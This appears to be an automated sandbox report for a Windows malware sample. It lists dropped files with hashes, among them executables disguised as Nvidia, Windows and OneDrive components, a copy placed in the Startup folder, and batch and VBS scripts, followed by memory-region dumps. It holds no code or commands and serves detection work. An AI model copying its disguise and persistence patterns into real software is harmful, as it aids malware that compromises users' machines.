7caf421a00071f6402ff022b60ebad247fc2f43f7cda8b190b9f5dfff577ed751d87f993d006c12f9c8bd1c45da3f9694ebf8d49d674259eec5d0b240dcc82c9

Download Submit
C:\Program Files (x86)\SubDir\NvidiaXdriver.exe
Filesize
441KB

MD5
53544a79f1385c3d2a0aeb67ac9ba34a

SHA1
c478a75a676458f582894768ab771c2382cebf19

SHA256
2f98fd7bd21a666a0488e26c537f0bd3fc1c03d02023efc669b6cc5654cacb82

SHA512
7caf421a00071f6402ff022b60ebad247fc2f43f7cda8b190b9f5dfff577ed751d87f993d006c12f9c8bd1c45da3f9694ebf8d49d674259eec5d0b240dcc82c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NvidiaXdriver.exe.log
Filesize
1KB

MD5
152746f93a38526f69d4b3e9cba4edb5

SHA1
eec0783bf6a9d3152bf8e0e5ed4c7f2451516a23

SHA256
0e415c9f150f04b421ef5addfc2dc0375bb06945c41bfa07234e2724035929c8

SHA512
7d87ace5cd1cf2ea68b7f67b80b1726fd4114349ae9b041212eabfa924389e75b295a310ad56c10ba66ab7df66aefcb945aeca76ecde9747b05a2bc1aa82b153

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6b33cff2c64571ee8b1cf14f157f317f

SHA1
ae4426839f5e8c28e8ac6d09b5499d1deda33fd2

SHA256
0381f2b66fae947afa407755ca58105879f85411d9a78b99774059f982ee3619

SHA512
61110504890848c0f2cff028a9f726445d5d63221bade9d3e801527483d29f9730051b10bdd5fa4b454cb40af130989c1aca3a123b5fe7ae665f3ee18c4fa2c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4b90550f375afbfd1b52d0731e835b52

SHA1
e07b218b14743ada74fb88d4109c7acaa83e5e07

SHA256
61787abb9fc57fdae394e0d5c15470ff78c4b97b9ebd77cd8ca1019c13a0c403

SHA512
a91918a888cdddc5d73c638d59276060461df2eee1b99d72f1c9478fd7888d3a8552ca6fdcdc219fa6e3b206c3ca32043ac1e64dcacb0a3b4bbb6820bc69718b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4b90550f375afbfd1b52d0731e835b52

SHA1
e07b218b14743ada74fb88d4109c7acaa83e5e07

SHA256
61787abb9fc57fdae394e0d5c15470ff78c4b97b9ebd77cd8ca1019c13a0c403

SHA512
a91918a888cdddc5d73c638d59276060461df2eee1b99d72f1c9478fd7888d3a8552ca6fdcdc219fa6e3b206c3ca32043ac1e64dcacb0a3b4bbb6820bc69718b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
50b4215308b1e1281aca0a3e61cbb5f5

SHA1
6b8981c27db6a967ff032572c1335b7be2d5d998

SHA256
8a0b53d4e23e9cac9c877eda3d30b750a86f749884b71a4a9f2ce69fcda0f25a

SHA512
c9e220f1f526d312e335ec82882295945822aae0453b3298f3044e5b86f0277a7d341abf997ec24451dabe0aac84ebed018b1e7a479a69c73d795a160e84a5a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
50b4215308b1e1281aca0a3e61cbb5f5

SHA1
6b8981c27db6a967ff032572c1335b7be2d5d998

SHA256
8a0b53d4e23e9cac9c877eda3d30b750a86f749884b71a4a9f2ce69fcda0f25a

SHA512
c9e220f1f526d312e335ec82882295945822aae0453b3298f3044e5b86f0277a7d341abf997ec24451dabe0aac84ebed018b1e7a479a69c73d795a160e84a5a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
50b4215308b1e1281aca0a3e61cbb5f5

SHA1
6b8981c27db6a967ff032572c1335b7be2d5d998

SHA256
8a0b53d4e23e9cac9c877eda3d30b750a86f749884b71a4a9f2ce69fcda0f25a

SHA512
c9e220f1f526d312e335ec82882295945822aae0453b3298f3044e5b86f0277a7d341abf997ec24451dabe0aac84ebed018b1e7a479a69c73d795a160e84a5a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
50b4215308b1e1281aca0a3e61cbb5f5

SHA1
6b8981c27db6a967ff032572c1335b7be2d5d998

SHA256
8a0b53d4e23e9cac9c877eda3d30b750a86f749884b71a4a9f2ce69fcda0f25a

SHA512
c9e220f1f526d312e335ec82882295945822aae0453b3298f3044e5b86f0277a7d341abf997ec24451dabe0aac84ebed018b1e7a479a69c73d795a160e84a5a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
50b4215308b1e1281aca0a3e61cbb5f5

SHA1
6b8981c27db6a967ff032572c1335b7be2d5d998

SHA256
8a0b53d4e23e9cac9c877eda3d30b750a86f749884b71a4a9f2ce69fcda0f25a

SHA512
c9e220f1f526d312e335ec82882295945822aae0453b3298f3044e5b86f0277a7d341abf997ec24451dabe0aac84ebed018b1e7a479a69c73d795a160e84a5a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
948B

MD5
48692deede706e3c123845ecf18a09f8

SHA1
d9d57f920ecb2930364ece6bbe0e2bd3497f3dd2

SHA256
b0a78cabcc67f43a1f5a57077c437e01da0223c4dade851e3b38d5cfd4b91971

SHA512
c6212bbf10cbb2d8b94d9709d37abd6b1495ec5642829379b315f663364185d2f56f216136334c22d7f5a416a248e80a8722a529b9cc80e0bc6179099ceed07f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
948B

MD5
48692deede706e3c123845ecf18a09f8

SHA1
d9d57f920ecb2930364ece6bbe0e2bd3497f3dd2

SHA256
b0a78cabcc67f43a1f5a57077c437e01da0223c4dade851e3b38d5cfd4b91971

SHA512
c6212bbf10cbb2d8b94d9709d37abd6b1495ec5642829379b315f663364185d2f56f216136334c22d7f5a416a248e80a8722a529b9cc80e0bc6179099ceed07f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
948B

MD5
48692deede706e3c123845ecf18a09f8

SHA1
d9d57f920ecb2930364ece6bbe0e2bd3497f3dd2

SHA256
b0a78cabcc67f43a1f5a57077c437e01da0223c4dade851e3b38d5cfd4b91971

SHA512
c6212bbf10cbb2d8b94d9709d37abd6b1495ec5642829379b315f663364185d2f56f216136334c22d7f5a416a248e80a8722a529b9cc80e0bc6179099ceed07f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
948B

MD5
48692deede706e3c123845ecf18a09f8

SHA1
d9d57f920ecb2930364ece6bbe0e2bd3497f3dd2

SHA256
b0a78cabcc67f43a1f5a57077c437e01da0223c4dade851e3b38d5cfd4b91971

SHA512
c6212bbf10cbb2d8b94d9709d37abd6b1495ec5642829379b315f663364185d2f56f216136334c22d7f5a416a248e80a8722a529b9cc80e0bc6179099ceed07f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
948B

MD5
48692deede706e3c123845ecf18a09f8

SHA1
d9d57f920ecb2930364ece6bbe0e2bd3497f3dd2

SHA256
b0a78cabcc67f43a1f5a57077c437e01da0223c4dade851e3b38d5cfd4b91971

SHA512
c6212bbf10cbb2d8b94d9709d37abd6b1495ec5642829379b315f663364185d2f56f216136334c22d7f5a416a248e80a8722a529b9cc80e0bc6179099ceed07f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
948B

MD5
48692deede706e3c123845ecf18a09f8

SHA1
d9d57f920ecb2930364ece6bbe0e2bd3497f3dd2

SHA256
b0a78cabcc67f43a1f5a57077c437e01da0223c4dade851e3b38d5cfd4b91971

SHA512
c6212bbf10cbb2d8b94d9709d37abd6b1495ec5642829379b315f663364185d2f56f216136334c22d7f5a416a248e80a8722a529b9cc80e0bc6179099ceed07f

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{d4c86d0c-8cd2-4528-b7a4-67dba5d9d397}\Apps.ft
Filesize
38KB

MD5
7314cfd2fad0b6b527a8fe3e6dd97596

SHA1
4fc9ef6d5e21c77a92010375a0a5942c3fbf4e4d

SHA256
98165953997752f649bbf3479ff75a6a1833984950f41f04aad8ca21a86d00c0

SHA512
0b3bab4cfda37ab597337132f92bdc3d3897ac6810d615b6c62cbed71ba8466039cd4da8763143e6ca16b6553f21a36d42e882c6388d4c1608eddf5fef92301d

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{d4c86d0c-8cd2-4528-b7a4-67dba5d9d397}\Apps.index
Filesize
1.0MB

MD5
67ba8e7f7f175a2ddba4371f52818d3f

SHA1
ea789f27b78199b51beeea15076b1bb66c6175a9

SHA256
b24597daa08491cde184ea8409d441fd6690490b1491f5cd8086d0afef35d12a

SHA512
ba9befae7761c5d03dc698eff9a7eed83f3a2a6a00080780e4dbe9139fdec800793f205a521857ba26b42b2cec6e0044b121ec1220a30ae6b9a1148920255903

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133088571402039382.txt
Filesize
74KB

MD5
58389702bfc312719fd36818c52a3ca0

SHA1
d1d5afd9487606aafcdca1da3a4fd084afe0c3ad

SHA256
a2f87f173eb21fb89d4a47c0606ceee93468035cda393f7c37260b0458c3f41d

SHA512
417ee72c394e5b1c75af2cf10a795c978aa8588b823c745261a7d032f8bdf5a935db79b089ed2abecf2c5225e2ad3b71401fd20c7ae93659b97a3505732d8cc9

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\INetCache\LDVHM0QJ\1FLtrEdHrNq7YDeeCYhb8ssigCI[1].js
Filesize
21KB

MD5
4fbd3f0588a267ff74b33c96803217bb

SHA1
6220502ce22bf4f3fa307d684de41aee6c29417d

SHA256
eb33166fa3c2d27116676731ec19c2e68610b40ef408e60951b0f201178a1217

SHA512
00fdd7e684763fbd80298a52477772564fb210a63f807d5b0557386656a39b1c7d0653346aeb929cf9f9cd481303216fad19a6a97b3ae5acbf8f22afc348a78a

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442
Filesize
1KB

MD5
e7f8b1371d5ac462e9761c8e1a9fe112

SHA1
241c78b76e6c6fe87ba7235c528d8dfbbfb371fc

SHA256
aa325267aaabaa0cf344f83597ebcf2d5041ba3c99f7e36dd6cbb641f482a342

SHA512
6f015027066a6ac4331acd6e853899fd9ea1d4924a04c55fcf7aafdc1f6060ee54a689271a458473ae8e98bd9fd749b9d40d05a6c42bad7213ed8e6b321c156c

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442
Filesize
416B

MD5
1b5bb4a0bfdfcad9359aa1709144ada5

SHA1
aa41d68f4686fdfee7f3bfba989b63766c0f4d03

SHA256
ce49cb2ec3c2157b096bd02fec20add421daaa96a26ee2d538d4e370af008eb0

SHA512
a3a2458c73fe09af3f8924843e5b08f30ecdebd08038dd4530d924fce77250b0e9699511045fc9c841b55809a739cb2077301c23825a3f691a572fba548b454c

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\E8T2NA25\www.bing[1].xml
Filesize
8KB

MD5
c2ca45de5c95506e64ca01cc2ec1c02c

SHA1
30598b390549d7fb44e1b314dd3d946461f00100

SHA256
20aa2fbc7a668ba5577f857d284a7fb1dbb746bb67bd69fc0200a8022263ccea

SHA512
bf6f75d66fe6f42fcf7e78b5b7f70ecb1021ac7ba52c13f341c9a7948a30b4526cac630f48312f18ec85fa2a5dda158b46eecc7f4ef699be78b8bf908db1d77c

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\E8T2NA25\www.bing[1].xml
Filesize
8KB

MD5
ad83e47593b862acc480ae2a29e0cdd0

SHA1
280533398ef652410dca6f8dec37c82b5a048b0f

SHA256
b968e7adc7ab70bdb4e6dbbe1c6d34ecfd1e172f68cdd9f5ebca7cea56cdc52d

SHA512
b42dde0de785f0315533a449218aad6c958d50aaae9ddcb2d78ed7a719649b850747557452447e4da8ca4260c8d61040191c34d5e11e905dfceaece2ce748467

Download Submit
C:\Users\Admin\AppData\Local\Temp\ASFUCK.exe
Filesize
509KB

MD5
da82f27258a7d2f6f9ea23916e35517e

SHA1
5a2d1bdd01942ef9aea8a10564223e4149c8dac0

SHA256
30438037edcaba75ba0045822886c4da7d1db256dee05038e35abafd6224a304

SHA512
b92da5601fd0d12aae82112bfc84c6604853e28c4a5c8ef7b9236a5a0cbd4a7b71ad62b14460c62a73a89e79554313ab19d639c68a6a980c057dbd41395a3289

Download Submit
C:\Users\Admin\AppData\Local\Temp\ASFUCK.exe
Filesize
509KB

MD5
da82f27258a7d2f6f9ea23916e35517e

SHA1
5a2d1bdd01942ef9aea8a10564223e4149c8dac0

SHA256
30438037edcaba75ba0045822886c4da7d1db256dee05038e35abafd6224a304

SHA512
b92da5601fd0d12aae82112bfc84c6604853e28c4a5c8ef7b9236a5a0cbd4a7b71ad62b14460c62a73a89e79554313ab19d639c68a6a980c057dbd41395a3289

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.bat
Filesize
1.6MB

MD5
3f420e49a68cae85be503564c5e23877

SHA1
ae3942b59ae0e02300511abd3a12038c2e2639cd

SHA256
124b9c30aa05c8b5fd8746a8d08e5f7cd8e48674509303d827a884672d430072

SHA512
4b3aaeca1abaef756d0178d03a2546a914e0be8d51c3736d768610fbf308d8fb3e5fdca20dbf224342d8197fa38f41c4755a8039821bf28279277468d801cc62

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\QUFUCK.exe
Filesize
441KB

MD5
53544a79f1385c3d2a0aeb67ac9ba34a

SHA1
c478a75a676458f582894768ab771c2382cebf19

SHA256
2f98fd7bd21a666a0488e26c537f0bd3fc1c03d02023efc669b6cc5654cacb82

SHA512
7caf421a00071f6402ff022b60ebad247fc2f43f7cda8b190b9f5dfff577ed751d87f993d006c12f9c8bd1c45da3f9694ebf8d49d674259eec5d0b240dcc82c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\QUFUCK.exe
Filesize
441KB

MD5
53544a79f1385c3d2a0aeb67ac9ba34a

SHA1
c478a75a676458f582894768ab771c2382cebf19

SHA256
2f98fd7bd21a666a0488e26c537f0bd3fc1c03d02023efc669b6cc5654cacb82

SHA512
7caf421a00071f6402ff022b60ebad247fc2f43f7cda8b190b9f5dfff577ed751d87f993d006c12f9c8bd1c45da3f9694ebf8d49d674259eec5d0b240dcc82c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Windows.exe
Filesize
27KB

MD5
b878e672061d2fb35964c7312d212e04

SHA1
05fdee1a9411e334f77b7dbefc49de58f0f4dc10

SHA256
74bf4b320b6c66539566cf67c760fecb8534a98f17155b2dd3670f827ce32a3c

SHA512
b9f74309af17bda2c0df5b4b238a601f24ce35015520b8accfd65060467744e08039032a2664620a32f58a52c7293c433149ce1decf3ff9a857054cc8beff1ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\Windows.exe
Filesize
27KB

MD5
b878e672061d2fb35964c7312d212e04

SHA1
05fdee1a9411e334f77b7dbefc49de58f0f4dc10

SHA256
74bf4b320b6c66539566cf67c760fecb8534a98f17155b2dd3670f827ce32a3c

SHA512
b9f74309af17bda2c0df5b4b238a601f24ce35015520b8accfd65060467744e08039032a2664620a32f58a52c7293c433149ce1decf3ff9a857054cc8beff1ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\script.vbs_.vbs
Filesize
23KB

MD5
93f437a847367aa37c3f98a83f0cdd18

SHA1
432896a58421202328045bc85126e57907f2fe7e

SHA256
41fd490ff3f047a9117e08838b6ad0d5d5a52823df31f9442f26b811b06279db

SHA512
71564759013f918518dff915c96674f75117fa20ac8e158271ab2298e6e8e06c062d4e90a4c2a4ed4bd9a41891c4fa8a0566e9a5dc5f7e84590c57b13d76a0b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF5BA.tmp.bat
Filesize
253B

MD5
e4179e7e784cf05e0a8c5000aa2be143

SHA1
c7e8b4b5843dcce12a22498c55e6b893808da49f

SHA256
8fada951b969adf1752561dda89de1e8f2be816cc30916d885fe85e3c83b2b4f

SHA512
0478a9a16d0e62d222ffdf1cf4879e8ff4c7772948235217360fbcc5e5e4eeced6e9587c7dfc8ba8911ce84280567edf221c8f32fd9bebdf09ab3e582ac6bf13

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft APIMethod\OneDriveStandaloneAPIMethod.exe
Filesize
724.1MB

MD5
36e583d7ba64a7f1c6bc5445ef10be98

SHA1
2001599033dff37e165856db97039db6520073cd

SHA256
de4060c35aa065956b3afcba9875175833d5fb03f3c75683b7a3c33e4ba8034b

SHA512
b0687917ee3e94841e3a3578ba5f5dbe29a5629e9a7229f706cb912b5bdcee7b79292db64d535eb01f46575dcf981210d10012bfda5a7a26f28545ba514d49e0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft APIMethod\OneDriveStandaloneAPIMethod.exe
Filesize
724.1MB

MD5
36e583d7ba64a7f1c6bc5445ef10be98

SHA1
2001599033dff37e165856db97039db6520073cd

SHA256
de4060c35aa065956b3afcba9875175833d5fb03f3c75683b7a3c33e4ba8034b

SHA512
b0687917ee3e94841e3a3578ba5f5dbe29a5629e9a7229f706cb912b5bdcee7b79292db64d535eb01f46575dcf981210d10012bfda5a7a26f28545ba514d49e0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe
Filesize
27KB

MD5
b878e672061d2fb35964c7312d212e04

SHA1
05fdee1a9411e334f77b7dbefc49de58f0f4dc10

SHA256
74bf4b320b6c66539566cf67c760fecb8534a98f17155b2dd3670f827ce32a3c

SHA512
b9f74309af17bda2c0df5b4b238a601f24ce35015520b8accfd65060467744e08039032a2664620a32f58a52c7293c433149ce1decf3ff9a857054cc8beff1ca

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk
Filesize
1KB

MD5
ccb4adf1a003df614fb1f8039d1be10a

SHA1
36d91fb76a2ef18acaf219327ff316a8a95d83b6

SHA256
84ad0844d225991376347b926b55bcde878f85b6f521fc3dc17e5e657663b9bf

SHA512
6fafee22e24d591ad56f5d41bbaeeae065aa81fac92e82372bba1288970926d155374e99e60aeaee7ba86e5ace112ad66e7f1169b4a940e50e0a849faec87184

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.lnk
Filesize
1KB

MD5
e4c1ab0952ee24e83a8338bd593e7b0a

SHA1
108f2750a77739f5318574aa65287fb9a36fcbb6

SHA256
6315a99f3c3f09f568c15aed16b9348da10a8b8b1f3e43322232350fb64f4f59

SHA512
b189f4cb4438e1017d2ca21dd432acf987f57ce48f141f47a1acde2bf813f35742b8180cc4c48d363d609b91697c4f7c0293c088101f79f82bb66e96422dd7e6

Download Submit
C:\Users\Admin\AppData\Roaming\Windows.exe
Filesize
27KB

MD5
b878e672061d2fb35964c7312d212e04

SHA1
05fdee1a9411e334f77b7dbefc49de58f0f4dc10

SHA256
74bf4b320b6c66539566cf67c760fecb8534a98f17155b2dd3670f827ce32a3c

SHA512
b9f74309af17bda2c0df5b4b238a601f24ce35015520b8accfd65060467744e08039032a2664620a32f58a52c7293c433149ce1decf3ff9a857054cc8beff1ca

Download Submit
C:\Users\Admin\AppData\Roaming\Windows.exe
Filesize
27KB

MD5
b878e672061d2fb35964c7312d212e04

SHA1
05fdee1a9411e334f77b7dbefc49de58f0f4dc10

SHA256
74bf4b320b6c66539566cf67c760fecb8534a98f17155b2dd3670f827ce32a3c

SHA512
b9f74309af17bda2c0df5b4b238a601f24ce35015520b8accfd65060467744e08039032a2664620a32f58a52c7293c433149ce1decf3ff9a857054cc8beff1ca

Download Submit
memory/476-260-0x0000000000000000-mapping.dmp

Download
memory/536-195-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/536-182-0x0000000000000000-mapping.dmp

Download
memory/536-231-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/620-375-0x000001C0182E0000-0x000001C018300000-memory.dmp

Filesize
128KB

Download
memory/624-199-0x0000000000000000-mapping.dmp

Download
memory/676-252-0x0000000000000000-mapping.dmp

Download
memory/732-164-0x0000000000000000-mapping.dmp

Download
memory/908-132-0x0000000000600000-0x0000000000716000-memory.dmp

Filesize
1.1MB

Download
memory/908-135-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/920-201-0x0000000000000000-mapping.dmp

Download
memory/992-169-0x0000000000000000-mapping.dmp

Download
memory/1016-218-0x0000000005A70000-0x0000000006014000-memory.dmp

Filesize
5.6MB

Download
memory/1016-249-0x0000000005A70000-0x0000000006014000-memory.dmp

Filesize
5.6MB

Download
memory/1016-167-0x0000000000E70000-0x0000000000EF6000-memory.dmp

Filesize
536KB

Download
memory/1016-160-0x0000000000000000-mapping.dmp

Download
memory/1016-220-0x0000000005A70000-0x0000000006014000-memory.dmp

Filesize
5.6MB

Download
memory/1016-172-0x0000000005990000-0x0000000005A22000-memory.dmp

Filesize
584KB

Download
memory/1016-171-0x0000000006020000-0x00000000065C4000-memory.dmp

Filesize
5.6MB

Download
memory/1308-236-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/1308-211-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/1308-194-0x0000000000000000-mapping.dmp

Download
memory/1384-208-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/1384-245-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/1384-190-0x0000000000000000-mapping.dmp

Download
memory/1400-407-0x000001B01AD20000-0x000001B01AD28000-memory.dmp

Filesize
32KB

Download
memory/1400-417-0x000001B01E020000-0x000001B01E023000-memory.dmp

Filesize
12KB

Download
memory/1400-415-0x000001B01E020000-0x000001B01E023000-memory.dmp

Filesize
12KB

Download
memory/1400-411-0x000001B01E011000-0x000001B01E015000-memory.dmp

Filesize
16KB

Download
memory/1400-396-0x000001B01C040000-0x000001B01C060000-memory.dmp

Filesize
128KB

Download
memory/1400-397-0x000001B01CD60000-0x000001B01CE60000-memory.dmp

Filesize
1024KB

Download
memory/1400-412-0x000001B01E011000-0x000001B01E015000-memory.dmp

Filesize
16KB

Download
memory/1400-410-0x000001B01E011000-0x000001B01E015000-memory.dmp

Filesize
16KB

Download
memory/1400-416-0x000001B01E020000-0x000001B01E023000-memory.dmp

Filesize
12KB

Download
memory/1400-409-0x000001B01E011000-0x000001B01E015000-memory.dmp

Filesize
16KB

Download
memory/1440-253-0x0000000000000000-mapping.dmp

Download
memory/1660-422-0x0000000000000000-mapping.dmp

Download
memory/1904-360-0x0000000000000000-mapping.dmp

Download
memory/2272-193-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/2272-234-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/2272-181-0x0000000000000000-mapping.dmp

Download
memory/2276-237-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/2276-185-0x0000000000000000-mapping.dmp

Download
memory/2276-198-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/2284-186-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/2284-222-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/2284-243-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/2284-178-0x0000000000000000-mapping.dmp

Download
memory/2352-219-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/2352-247-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/2352-152-0x0000000000000000-mapping.dmp

Download
memory/2352-163-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/2468-151-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/2468-147-0x0000000000000000-mapping.dmp

Download
memory/2468-180-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/2712-189-0x0000000000000000-mapping.dmp

Download
memory/2712-207-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/2712-246-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/2760-153-0x0000000000000000-mapping.dmp

Download
memory/2760-166-0x0000000000760000-0x000000000076E000-memory.dmp

Filesize
56KB

Download
memory/2760-168-0x0000000005000000-0x000000000509C000-memory.dmp

Filesize
624KB

Download
memory/3292-248-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/3292-227-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/3292-191-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/3292-179-0x0000000000000000-mapping.dmp

Download
memory/3336-421-0x0000000000000000-mapping.dmp

Download
memory/3376-361-0x0000000008564000-0x0000000008567000-memory.dmp

Filesize
12KB

Download
memory/3376-267-0x0000000008560000-0x0000000008564000-memory.dmp

Filesize
16KB

Download
memory/3376-264-0x00000000054C0000-0x0000000005A64000-memory.dmp

Filesize
5.6MB

Download
memory/3376-286-0x0000000008564000-0x0000000008567000-memory.dmp

Filesize
12KB

Download
memory/3376-284-0x00000000054C0000-0x0000000005A64000-memory.dmp

Filesize
5.6MB

Download
memory/3376-257-0x0000000000000000-mapping.dmp

Download
memory/3376-358-0x0000000008560000-0x0000000008564000-memory.dmp

Filesize
16KB

Download
memory/3456-233-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/3456-197-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/3456-184-0x0000000000000000-mapping.dmp

Download
memory/3508-176-0x0000000000000000-mapping.dmp

Download
memory/3696-244-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/3696-209-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/3696-192-0x0000000000000000-mapping.dmp

Download
memory/4156-250-0x0000000000000000-mapping.dmp

Download
memory/4288-149-0x00007FFA70F50000-0x00007FFA7100E000-memory.dmp

Filesize
760KB

Download
memory/4288-173-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp

Filesize
10.8MB

Download
memory/4288-175-0x00007FFA70F50000-0x00007FFA7100E000-memory.dmp

Filesize
760KB

Download
memory/4288-145-0x00007FFA71D50000-0x00007FFA71F45000-memory.dmp

Filesize
2.0MB

Download
memory/4288-140-0x0000000000000000-mapping.dmp

Download
memory/4288-146-0x00007FFA70F50000-0x00007FFA7100E000-memory.dmp
